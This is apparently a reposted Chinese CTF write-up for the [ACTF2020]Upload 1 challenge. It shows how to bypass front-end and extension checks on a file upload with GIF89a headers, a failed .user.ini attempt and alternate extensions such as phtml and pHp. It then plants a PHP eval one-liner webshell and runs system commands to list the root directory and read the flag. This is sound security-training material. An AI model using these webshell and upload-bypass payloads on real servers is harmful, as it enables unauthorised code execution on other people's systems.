自学内容网 自学内容网

[ACTF2020]Upload 1--详细解析

信息收集

题目告诉我们是一道upload,也就是文件上传漏洞题目。
进入界面,是一个灯泡,将鼠标放在图标上就会出现文件上传的相应位置:
在这里插入图片描述

思路

文件上传漏洞,先看看有没有前端校验。
在js源码中找到了前端校验:
在这里插入图片描述也就是只能上传jpg,png,gif后缀的文件。

先准备一个最基本的一句话木马:

//shell.php
GIF89a //这里是为了绕过可能存在的文件头检测
<?php @eval($_POST[1])?>

修改为.png后缀,上传并抓包修改回php后缀
在这里插入图片描述
注意左上角,返回的内容是nonono~ Bad file!

此时有两种可能,一种是后端对文件后缀进行了过滤;第二种是对文件内容进行了过滤。

如果我们不修改后缀将.png文件直接上传:
在这里插入图片描述
会发现左上角显示上传成功。

Upload Success! Look here~
./uplo4d/00bf23e130fa1e525e332ff03dae345d.png

说明后端对文件内容没有被过滤,被过滤的是后缀名

既然后缀名被过滤,我们考虑上传.user.ini文件将成功上传的文件以PHP代码形式解析:

//.user.ini
GIF89a
auto_prepend_file=00bf23e130fa1e525e332ff03dae345d.png

同样是修改为.png绕过前端校验与MIME验证,再抓包改回来。
在这里插入图片描述

Upload Success! Look here~
./uplo4d/7356ccb66a890ccd51ee57dc56bb134c.ini

这里注意.user.ini文件名上传后被修改为7356ccb66a890ccd51ee57dc56bb134c.ini,那么.user.ini就不能发挥作用了,所以上传.user.ini配置文件的方法失败。

这里学习一个新知识点:
在Apache中,以下后缀名都会被服务器解析为PHP文件:

phtml
php
php3
php4
php5
inc
//下面是对上面的大小写混写绕过
pHtml
pHp
pHp3
pHp4
pHp5
iNc

我们抓包测试一下这些后缀名,看看有没有能上传成功的:
在这里插入图片描述
发现html和php的大小写混写都能绕过。

先试了php的大小写混写,确实能上传,但是访问时依然显示解析出错。
还是上传了phtml文件,进入后发现成功访问!
在这里插入图片描述

1=system("ls /");
1=system("tac /flag");

得到flag.

总结

学到了Apache下的php后缀名解析漏洞,今后在面对后端后缀名过滤时又多了一种解决方法。


原文地址:https://blog.csdn.net/m0_56019217/article/details/143753528

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!